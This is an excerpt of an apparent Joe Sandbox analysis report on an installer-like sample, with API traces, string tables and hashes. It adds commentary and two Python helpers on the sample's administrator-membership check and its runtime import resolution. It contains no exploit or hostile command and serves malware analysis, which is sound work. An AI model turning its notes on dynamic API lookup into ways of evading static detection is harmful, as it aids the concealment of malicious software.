40ccdf 56102->56100 56104 40cd90 56103->56104 56105 40cd9c 56103->56105 56113 40cab8 19 API calls 56104->56113 56105->56090 56108 403738 56107->56108 56109 406edc CreateFileA 56108->56109 56109->56097 56110->56100 56111->56098 56112->56102 56113->56105 56120 452510 56114->56120 56116 4525e5 56116->55847 56117 453344 18 API calls 56116->56117 56117->55847 56118->55857 56119->55858 56121 403738 56120->56121 56122 45252d 754B1520 56121->56122 56123 4525b2 56122->56123 56124 45253b 56122->56124 56126 4525c5 56123->56126 56133 452334 41 API calls 56123->56133 56125 402648 18 API calls 56124->56125 56127 452542 754B1500 56125->56127 56126->56116 56129 452580 56127->56129 56130 452566 754B1540 56127->56130 56131 402660 4 API calls 56129->56131 56130->56129 56132 4525aa 56131->56132 56132->56116 56133->56126 56135->55882 56137->55895 56139 448462 56138->56139 56341 447a00 56139->56341
                                                                                Strings
                                                                                • Incrementing shared file count (64-bit)., xrefs: 0047158C
                                                                                • Installing into GAC, xrefs: 00471714
                                                                                • Skipping due to "onlyifdoesntexist" flag., xrefs: 004709CE
                                                                                • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470CD0
                                                                                • Time stamp of existing file: %s, xrefs: 00470A2B
                                                                                • Non-default bitness: 32-bit, xrefs: 004708BB
                                                                                • Time stamp of our file: (failed to read), xrefs: 004709A7
                                                                                • Time stamp of existing file: (failed to read), xrefs: 00470A37
                                                                                • Installing the file., xrefs: 00470F09
                                                                                • .tmp, xrefs: 00470FB7
                                                                                • @, xrefs: 004707B0
                                                                                • , xrefs: 00470BCF, 00470DA0, 00470E1E
                                                                                • Version of our file: (none), xrefs: 00470AFC
                                                                                • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 00470E96
                                                                                • Existing file has a later time stamp. Skipping., xrefs: 00470DCF
                                                                                • Dest file is protected by Windows File Protection., xrefs: 004708ED
                                                                                • Uninstaller requires administrator: %s, xrefs: 0047118F
                                                                                • Will register the file (a DLL/OCX) later., xrefs: 0047151F
                                                                                • Version of existing file: (none), xrefs: 00470CFA
                                                                                • Non-default bitness: 64-bit, xrefs: 004708AF
                                                                                • Same version. Skipping., xrefs: 00470CE5
                                                                                • Version of existing file: %u.%u.%u.%u, xrefs: 00470B7C
                                                                                • Existing file is a newer version. Skipping., xrefs: 00470C02
                                                                                • Stripped read-only attribute., xrefs: 00470EC7
                                                                                • Skipping due to "onlyifdestfileexists" flag., xrefs: 00470EFA
                                                                                • Dest file exists., xrefs: 004709BB
                                                                                • Incrementing shared file count (32-bit)., xrefs: 004715A5
                                                                                • Same time stamp. Skipping., xrefs: 00470D55
                                                                                • Failed to strip read-only attribute., xrefs: 00470ED3
                                                                                • InUn, xrefs: 0047115F
                                                                                • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470CC4
                                                                                • Couldn't read time stamp. Skipping., xrefs: 00470D35
                                                                                • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470DEC
                                                                                • Time stamp of our file: %s, xrefs: 0047099B
                                                                                • User opted not to overwrite the existing file. Skipping., xrefs: 00470E4D
                                                                                • -- File entry --, xrefs: 004706FB
                                                                                • Version of our file: %u.%u.%u.%u, xrefs: 00470AF0
                                                                                • Dest filename: %s, xrefs: 00470894
                                                                                • Will register the file (a type library) later., xrefs: 00471513
                                                                                • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470CB5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                • API String ID: 0-4021121268
                                                                                • Opcode ID: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                • Instruction ID: 04e5041402f80353ef90c659d92e8d378e84d4fed116f8838aecbbc27e5febe3
                                                                                • Opcode Fuzzy Hash: cebd1a573a13cfb1480ab73f2a07467b13e4d984594641078933206a2f2f5451
                                                                                • Instruction Fuzzy Hash: 31927574A0424CDFDB21DFA9C445BDDBBB5AF05304F1480ABE848A7392D7789E49CB19

                                                                                Control-flow Graph
                                                                                • Graph image not reproduced in this text export. Basic blocks 0x42e09c-0x42e28f; API calls in address order: AllocateAndInitializeSid, GetVersion, GetModuleHandleA, GetProcAddress, CheckTokenMembership, GetCurrentThread, OpenThreadToken, GetLastError, GetCurrentProcess, OpenProcessToken, GetTokenInformation, GetLastError, GetTokenInformation, EqualSid (in a loop over the returned groups), CloseHandle, FreeSid.
                                                                                APIs
                                                                                • AllocateAndInitializeSid.ADVAPI32(00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0D6
                                                                                • GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0F3
                                                                                • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E10C
                                                                                • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112
                                                                                • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E127
                                                                                • FreeSid.ADVAPI32(00000000,0042E287,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E27A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                • String ID: CheckTokenMembership$advapi32.dll
                                                                                • API String ID: 2252812187-1888249752
                                                                                • Opcode ID: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                • Instruction ID: e5677345bf142a8b1d9111380f95962c8bb8cf61ba8e960ca5c3fd0f127139eb
                                                                                • Opcode Fuzzy Hash: a9f409996ddfe82e0213da269ff1de212d34eb3ec341ac20085b7d7d2472ef68
                                                                                • Instruction Fuzzy Hash: E351A271B44215EEEB10EAE69C42BBF77ACEB09704F9404BBB901F7281D57C99018B79
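The function at 0x42e09c is an administrator-membership check. The AllocateAndInitializeSid arguments in the trace (two sub-authorities, 0x20 and 0x220, i.e. SECURITY_BUILTIN_DOMAIN_RID and DOMAIN_ALIAS_RID_ADMINS) build S-1-5-32-544, BUILTIN\Administrators, provided the identifier authority behind the pointer 0x499788 is SECURITY_NT_AUTHORITY; the trace does not show those six bytes, so the example below assumes it. GetVersion plus GetProcAddress("CheckTokenMembership") selects CheckTokenMembership where advapi32 exports it and otherwise falls back to opening the thread or process token, calling GetTokenInformation(TokenGroups) and comparing each group with EqualSid. The practitioner caveat: CheckTokenMembership ignores groups flagged SE_GROUP_USE_FOR_DENY_ONLY, which is how a UAC-filtered token carries Administrators, so it reports "not admin" for a non-elevated process, while a bare EqualSid scan of TokenGroups reports "admin" unless it also inspects the Attributes field; the trace alone does not show which the sample does. This check is standard in installer runtimes and is not, by itself, an indicator of malice. The following Python is an added example, not code from the report or the sample: it builds the SID in the binary layout AllocateAndInitializeSid produces, renders it as a string, and contrasts the two membership tests on constructed token data.

```python
"""Administrator check reconstructed from the API trace at 0x42e09c.

Added example, not code from the sample or from the report. The identifier
authority is ASSUMED to be SECURITY_NT_AUTHORITY (5): the trace shows only
the pointer 0x499788, not the six bytes it points to.
"""
import struct
from typing import Iterable, Tuple

SECURITY_NT_AUTHORITY = 5            # assumption, see module docstring
SECURITY_WORLD_SID_AUTHORITY = 1
SECURITY_BUILTIN_DOMAIN_RID = 0x20   # 3rd AllocateAndInitializeSid argument in the trace
DOMAIN_ALIAS_RID_ADMINS = 0x220      # 4th argument in the trace
DOMAIN_ALIAS_RID_USERS = 0x221

# SID_AND_ATTRIBUTES.Attributes bits (winnt.h)
SE_GROUP_ENABLED = 0x00000004
SE_GROUP_OWNER = 0x00000008
SE_GROUP_USE_FOR_DENY_ONLY = 0x00000010

TokenGroups = Iterable[Tuple[bytes, int]]   # (binary SID, attributes)


def build_sid(authority: int, *subauthorities: int) -> bytes:
    """Binary SID in the layout AllocateAndInitializeSid produces: revision
    byte = 1, sub-authority count byte, 48-bit big-endian identifier
    authority, then each sub-authority as a little-endian uint32."""
    if not 1 <= len(subauthorities) <= 15:
        raise ValueError("a SID carries 1..15 sub-authorities")
    return (struct.pack("BB", 1, len(subauthorities))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subauthorities))


def sid_to_string(sid: bytes) -> str:
    """Render a binary SID as S-R-I-S-S... (ConvertSidToStringSid output)."""
    revision, count = struct.unpack_from("BB", sid, 0)
    if revision != 1 or len(sid) != 8 + 4 * count:
        raise ValueError("malformed SID")
    authority = int.from_bytes(sid[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, sid, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


ADMINISTRATORS = build_sid(SECURITY_NT_AUTHORITY,
                           SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS)


def equal_sid(a: bytes, b: bytes) -> bool:
    """EqualSid: same revision, count and sub-authorities. For well-formed
    SIDs that is a byte-for-byte comparison."""
    return a == b


def is_admin_naive(groups: TokenGroups) -> bool:
    """The fallback path in the trace (OpenThreadToken/OpenProcessToken,
    GetTokenInformation(TokenGroups), EqualSid per entry) written as a scan
    that ignores the Attributes field."""
    return any(equal_sid(sid, ADMINISTRATORS) for sid, _attrs in groups)


def is_admin_check_token_membership(groups: TokenGroups) -> bool:
    """What CheckTokenMembership reports: the SID must be present, enabled,
    and not flagged SE_GROUP_USE_FOR_DENY_ONLY (the state of
    BUILTIN\\Administrators in a UAC-filtered token)."""
    for sid, attrs in groups:
        if (equal_sid(sid, ADMINISTRATORS)
                and attrs & SE_GROUP_ENABLED
                and not attrs & SE_GROUP_USE_FOR_DENY_ONLY):
            return True
    return False


# Constructed TokenGroups, modelled on a UAC-filtered (medium integrity)
# token and on the elevated token of the same user.
FILTERED_TOKEN = [
    (build_sid(SECURITY_WORLD_SID_AUTHORITY, 0), SE_GROUP_ENABLED),                       # Everyone
    (build_sid(SECURITY_NT_AUTHORITY, 0x20, DOMAIN_ALIAS_RID_USERS), SE_GROUP_ENABLED),   # BUILTIN\Users
    (ADMINISTRATORS, SE_GROUP_USE_FOR_DENY_ONLY),                                         # deny-only
]
ELEVATED_TOKEN = [
    (build_sid(SECURITY_WORLD_SID_AUTHORITY, 0), SE_GROUP_ENABLED),
    (build_sid(SECURITY_NT_AUTHORITY, 0x20, DOMAIN_ALIAS_RID_USERS), SE_GROUP_ENABLED),
    (ADMINISTRATORS, SE_GROUP_ENABLED | SE_GROUP_OWNER),
]

if __name__ == "__main__":
    print("target SID:", sid_to_string(ADMINISTRATORS))
    for label, token in (("filtered", FILTERED_TOKEN), ("elevated", ELEVATED_TOKEN)):
        print(label, "naive:", is_admin_naive(token),
              "CheckTokenMembership:", is_admin_check_token_membership(token))
```

The split result on the filtered token (naive scan says admin, CheckTokenMembership says not) is the behaviour to keep in mind when a sample only walks TokenGroups: on Vista and later it decides "administrator" for a medium-integrity process and may then attempt operations that fail or prompt for elevation.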

                                                                                Control-flow Graph
                                                                                • Graph image not reproduced in this text export. Basic blocks 0x4502c0-0x450386; API calls in address order: GetVersion, LoadLibraryA, then six GetProcAddress calls in one block (0x4502fe-0x450377).
                                                                                APIs
                                                                                • GetVersion.KERNEL32(00480B52), ref: 004502D3
                                                                                • LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmStartSession), ref: 00450309
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmRegisterResources), ref: 0045031E
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmGetList), ref: 00450333
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmShutdown), ref: 00450348
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmRestart), ref: 0045035D
                                                                                • GetProcAddress.KERNEL32(6ECE0000,RmEndSession), ref: 00450372
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoadVersion
                                                                                • String ID: RmEndSession$RmGetList$RmRegisterResources$RmRestart$RmShutdown$RmStartSession$Rstrtmgr.dll
                                                                                • API String ID: 1968650500-3419246398
                                                                                • Opcode ID: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                • Instruction ID: c77cef2ad5653e61b65a4477cbb73d0d56cf7b8a9d174f96be3e9b6947252677
                                                                                • Opcode Fuzzy Hash: 2681632e5309952c30eea3f8c2bf2722b4339596373eceda0d07b93e3cd0d7e4
                                                                                • Instruction Fuzzy Hash: B211F7B4510301DBD710FB61BF45A2E36E9E728315B08063FE804961A2CB7C4844CF8C

                                                                                Control-flow Graph
                                                                                • Graph image not reproduced in this text export. Basic blocks 0x423c0c-0x424177, a large switch-like structure with many internal subroutine calls; user32 APIs appearing in the graph: IsIconic, GetFocus, SetFocus, SendMessageA, PostMessageA, IsWindowEnabled, IsWindowVisible.
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                • Instruction ID: afb4f91cf4018cf9acc1c9974f14325182323c15c0e0405bd0f9b005e596376e
                                                                                • Opcode Fuzzy Hash: 22958418fcb5307417e2cb8c5b21c835fdc4d5c2778e3f26f52eb9817f6a2da5
                                                                                • Instruction Fuzzy Hash: 03E1AE31700124EFDB04DF69E989AADB7B5FB54300FA440AAE5559B352C73CEE81DB09

                                                                                Control-flow Graph
                                                                                • Graph image not reproduced in this text export. Basic blocks 0x4673a4-0x468abe, dominated by internal subroutine calls (0x466800, 0x468c94, 0x414b18, 0x466b38, 0x4145fc and others); direct API calls appearing in the graph: LoadBitmapA, GetSystemMenu, AppendMenuA (twice). Further APIs reached through subcalls are listed under APIs below.
                                                                                APIs
                                                                                  • Part of subcall function 004958CC: GetWindowRect.USER32(00000000), ref: 004958E2
                                                                                • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00467773
                                                                                  • Part of subcall function 0041D6B0: GetObjectA.GDI32(?,00000018,0046778D), ref: 0041D6DB
                                                                                  • Part of subcall function 00467180: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 00467223
                                                                                  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467249
                                                                                  • Part of subcall function 00467180: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 004672A0
                                                                                  • Part of subcall function 00466B40: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                  • Part of subcall function 00495B50: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00495B5A
                                                                                  • Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                  • Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                  • Part of subcall function 0049581C: GetDC.USER32(00000000), ref: 0049583E
                                                                                  • Part of subcall function 0049581C: SelectObject.GDI32(?,00000000), ref: 00495864
                                                                                  • Part of subcall function 0049581C: ReleaseDC.USER32(00000000,?), ref: 004958B5
                                                                                  • Part of subcall function 00495B40: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00495B4A
                                                                                • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,021BFC4C,021C1944,?,?,021C1974,?,?,021C19C4,?), ref: 004683FD
                                                                                • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046840E
                                                                                • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00468426
                                                                                  • Part of subcall function 0042A05C: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 0042A072
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$AppendExtractIconObject$AddressAutoBitmapCallbackCompleteDispatcherFileInfoLoadMessageProcRectReleaseSelectSendSystemUserWindow
                                                                                • String ID: $(Default)$STOPIMAGE$%H
                                                                                • API String ID: 3231140908-2624782221
                                                                                • Opcode ID: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                • Instruction ID: 1a3196d4b4984e68f3522cc8585b165e0004af585c118fa25862355e2bbb38c0
                                                                                • Opcode Fuzzy Hash: cd61aa661d0cbe35304877807cea77ca0702e96d718fc27b010991c92e86a780
                                                                                • Instruction Fuzzy Hash: 95F2C6346005248FCB00EF69D9D9F9973F1BF49304F1582BAE5049B36ADB74AC46CB9A
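Three functions in this section resolve imports at run time instead of through the PE import table: 0x42e0f3-0x42e112 looks up CheckTokenMembership in advapi32.dll, 0x4502c0 loads Rstrtmgr.dll and resolves RmStartSession, RmRegisterResources, RmGetList, RmShutdown, RmRestart and RmEndSession, and the subcall at 0x42ed38 resolves SHAutoComplete (called afterwards from SHLWAPI). This is the pattern behind the "Contains functionality to dynamically determine API calls" signature in the overview; when the lookup is guarded by GetVersion, as here, it is a compatibility shim for APIs that older Windows versions lack rather than import hiding, but the resolved names are still worth pulling out because a static import listing will not show them. One caveat when scripting this against the trace: the argument columns are stack snapshots and can be stale. At 0x42e112 GetProcAddress shows `advapi32.dll` as its second argument, while the real export name, `CheckTokenMembership`, appears in the preceding GetModuleHandleA line and in the record's String ID list (`CheckTokenMembership$advapi32.dll`). The Python below is an added example, not the report's or the sandbox's code; its input is the trace lines copied from this page (trailing stack arguments trimmed). It parses the API lines, attributes each GetProcAddress to the most recently loaded module or to the module of a later direct call of the same name, and falls back to the String ID list when the argument is not a plausible export name.

```python
"""Recover dynamically resolved imports from Joe Sandbox API-trace lines.

Added example, not part of the report or the sandbox. The sample lines are
copied from this report's per-function "APIs" lists; the rest is a
heuristic reproduction of what an analyst does by hand.
"""
import re
from collections import OrderedDict
from typing import Dict, Iterable, List, Sequence, Tuple

# "Name.MODULE(arg,arg,...), ref: 0042E112"; the "Part of subcall function
# 0042ED38:" prefix the report puts on callee lines is skipped by search().
CALL_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")
HEX_ARG = re.compile(r"^[0-9A-Fa-f]{8}$")
IDENT = re.compile(r"^[A-Za-z_]\w*$")
RESOLVERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
             "GetModuleHandleA", "GetModuleHandleW"}

Call = Tuple[str, str, List[str], str]   # api, module, args, ref
Import = Tuple[str, str, str]           # export, ref, how it was recovered


def normalize_module(name: str) -> str:
    return re.sub(r"\.dll$", "", name.strip().lower())


def parse_calls(lines: Iterable[str]) -> List[Call]:
    """(api, module, args, ref) per trace line; lines that are not calls are skipped."""
    calls = []
    for line in lines:
        m = CALL_RE.search(line)
        if m:
            api, mod, args, ref = m.groups()
            calls.append((api, normalize_module(mod),
                          [a.strip() for a in args.split(",")], ref.upper()))
    return calls


def looks_like_export(arg: str) -> bool:
    """Export names are identifiers; stale stack slots show up as 8-digit hex
    values, '?' or module names such as 'advapi32.dll'."""
    return bool(IDENT.match(arg)) and not arg.lower().endswith(".dll")


def resolved_imports(lines: Iterable[str],
                     string_ids: Sequence[str] = ()) -> Dict[str, List[Import]]:
    """Map module -> exports the traced function resolves with GetProcAddress.

    Attribution: the most recent LoadLibrary*/GetModuleHandle* module in the
    trace, else the module of a direct call with the same name. A lookup whose
    argument is not a plausible export is recovered from the String ID list
    when exactly one unexplained identifier remains there.
    """
    calls = parse_calls(lines)
    direct = {api: mod for api, mod, _, _ in calls
              if api != "GetProcAddress" and api not in RESOLVERS}
    imports: Dict[str, List[Import]] = OrderedDict()
    current = None
    seen = set()
    for api, _mod, args, ref in calls:
        if api in RESOLVERS and args and args[0] != "?" and not HEX_ARG.match(args[0]):
            current = normalize_module(args[0])
        elif api == "GetProcAddress":
            name = args[1] if len(args) > 1 else ""
            how = "argument"
            if not looks_like_export(name):
                leftover = [s for s in string_ids if looks_like_export(s) and s not in seen]
                if len(leftover) != 1:
                    imports.setdefault("?", []).append((name or "<missing>", ref, "unrecovered"))
                    continue
                name, how = leftover[0], "string-id"
            seen.add(name)
            imports.setdefault(current or direct.get(name) or "?", []).append((name, ref, how))
    return imports


# Trace lines copied from this report (constructed input; long stack-argument lists trimmed).
ADMIN_CHECK = [
    "GetVersion.KERNEL32(00000000,0042E280,?,00499788,00000002,00000020,00000220), ref: 0042E0F3",
    "GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E280,?,00499788), ref: 0042E10C",
    "GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E112",
    "CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E280,?,00499788), ref: 0042E127",
]
ADMIN_STRING_IDS = ["CheckTokenMembership", "advapi32.dll"]   # the record's String ID line, split on '$'
RESTART_MANAGER = [
    "GetVersion.KERNEL32(00480B52), ref: 004502D3",
    "LoadLibraryA.KERNEL32(Rstrtmgr.dll,00480B52), ref: 004502EB",
    "GetProcAddress.KERNEL32(6ECE0000,RmStartSession), ref: 00450309",
    "GetProcAddress.KERNEL32(6ECE0000,RmRegisterResources), ref: 0045031E",
    "GetProcAddress.KERNEL32(6ECE0000,RmGetList), ref: 00450333",
    "GetProcAddress.KERNEL32(6ECE0000,RmShutdown), ref: 00450348",
    "GetProcAddress.KERNEL32(6ECE0000,RmRestart), ref: 0045035D",
    "GetProcAddress.KERNEL32(6ECE0000,RmEndSession), ref: 00450372",
]
WIZARD_SUBCALLS = [
    "Part of subcall function 0042ED38: GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8",
    "Part of subcall function 0042ED38: SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5",
]

if __name__ == "__main__":
    for label, lines, ids in (("0x42e09c", ADMIN_CHECK, ADMIN_STRING_IDS),
                              ("0x4502c0", RESTART_MANAGER, ()), ("0x42ed38", WIZARD_SUBCALLS, ())):
        print(label, dict(resolved_imports(lines, ids)))
```

Entries tagged "string-id" or filed under "?" are the ones to confirm by hand against the disassembly; the heuristic is only as good as the stack snapshot the sandbox captured.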
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 00474FE1
                                                                                • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750BE
                                                                                • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004750F2,?,?,0049C1E0,00000000), ref: 004750CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseFirstNext
                                                                                • String ID: unins$unins???.*
                                                                                • API String ID: 3541575487-1009660736
                                                                                • Opcode ID: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                • Instruction ID: 191fa049ef1442540897bd6b232d6b1da598bf4afdbbee48782243349675ce5a
                                                                                • Opcode Fuzzy Hash: 490a2bf6f62b777b12f8bb075fd261ec892e44da2a65e6c72c5e66397d3a6b60
                                                                                • Instruction Fuzzy Hash: 95315074A00548ABCB10EB65CD81BDEB7A9DF45304F50C0B6E40CAB3A2DB789F418B59
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452A9D
                                                                                • GetLastError.KERNEL32(00000000,?,00000000,00452AC3,?,?,-00000001,00000000), ref: 00452AA5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
